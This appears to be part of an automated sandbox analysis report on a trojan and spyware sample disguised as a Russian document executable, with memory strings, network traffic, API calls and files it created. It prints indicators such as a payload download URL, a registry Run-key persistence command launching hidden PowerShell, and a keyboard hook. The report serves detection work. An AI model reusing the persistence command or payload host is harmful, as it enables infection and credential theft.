            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpo
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhvED54.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://s.symcd.com06
            Source: powershell.exe, 00000002.00000002.1648736662.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: powershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1703163430.000000000357D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wab.exe, 00000010.00000002.1703163430.000000000357D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wab.exe, 0000000D.00000002.1716385215.00000000009DF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.1648736662.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: https://d.symcb.com/cps0%
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: https://d.symcb.com/rpa0
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeString found in binary or memory: https://d.symcb.com/rpa0.
            Source: powershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wab.exe, 0000000D.00000003.1715963959.0000000002F29000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.1716920149.0000000002F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wab.exe, 0000000D.00000002.1716920149.0000000002F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wab.exe, 0000000D.00000002.1716920149.0000000002F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wab.exe, wab.exe, 0000000D.00000002.1716875718.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/;
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3761693345.0000000020490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin5
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.9:49712 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_00406E9F

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7500, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_0434C5B5 Sleep,NtProtectVirtualMemory,8_2_0434C5B5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Windows\Fonts\tashlik.iniJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Windows\resources\0809\marmoreret.iniJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004070400_2_00407040
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004068690_2_00406869
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00404B2B0_2_00404B2B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C6F0002_2_04C6F000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C6F8D02_2_04C6F8D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C6ECB82_2_04C6ECB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04ECA6398_3_04ECA639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04EC4EF48_3_04EC4EF4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04ECA6398_3_04ECA639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04EC4EF48_3_04EC4EF4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04ECA6398_3_04ECA639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04EC4EF48_3_04EC4EF4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04ECA6398_3_04ECA639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04EC4EF48_3_04EC4EF4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E40A948_3_20E40A94
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E40A948_3_20E40A94
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E36B998_3_20E36B99
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E40A948_3_20E40A94
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E40A948_3_20E40A94
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20E36B998_3_20E36B99
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20C971ED8_3_20C971ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CA127B8_3_20CA127B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20C58C1F8_3_20C58C1F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20C677B68_3_20C677B6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20C1E1958_3_20C1E195
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20BEE75E8_3_20BEE75E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20C282238_3_20C28223
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20BDFBC78_3_20BDFBC7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1A2DB8_3_20D1A2DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CE08168_3_20CE0816
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20D1024D8_3_20D1024D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_20CD1C7F8_3_20CD1C7F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A171948_2_20A17194
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A0B5C18_2_20A0B5C1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B04013_2_0044B040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043610D13_2_0043610D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044731013_2_00447310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A49013_2_0044A490
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040755A13_2_0040755A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C56013_2_0043C560
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B61013_2_0044B610
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044D6C013_2_0044D6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004476F013_2_004476F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B87013_2_0044B870
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044081D13_2_0044081D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041495713_2_00414957
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004079EE13_2_004079EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407AEB13_2_00407AEB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044AA8013_2_0044AA80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00412AA913_2_00412AA9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B7413_2_00404B74
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B0313_2_00404B03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044BBD813_2_0044BBD8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404BE513_2_00404BE5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404C7613_2_00404C76
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00415CFE13_2_00415CFE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416D7213_2_00416D72
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D3013_2_00446D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D8B13_2_00446D8B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E8F13_2_00406E8F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040503814_2_00405038
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041208C14_2_0041208C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050A914_2_004050A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040511A14_2_0040511A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043C13A14_2_0043C13A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051AB14_2_004051AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044930014_2_00449300
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040D32214_2_0040D322
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A4F014_2_0044A4F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043A5AB14_2_0043A5AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041363114_2_00413631
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044669014_2_00446690
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A73014_2_0044A730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004398D814_2_004398D8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004498E014_2_004498E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A88614_2_0044A886
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043DA0914_2_0043DA09
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00438D5E14_2_00438D5E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00449ED014_2_00449ED0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041FE8314_2_0041FE83
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00430F5414_2_00430F54
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: invalid certificate
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe, 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehyperenthusiastically rdkridtet.exeDVarFileInfo$ vs #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeBinary or memory string: OriginalFilenamehyperenthusiastically rdkridtet.exeDVarFileInfo$ vs #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@23/19@4/3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,13_2_004182CE
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,13_2_00413D4C
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,13_2_0040B58D
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Program Files (x86)\Common Files\Levantine.iniJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Users\user\AppData\Local\nervierJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
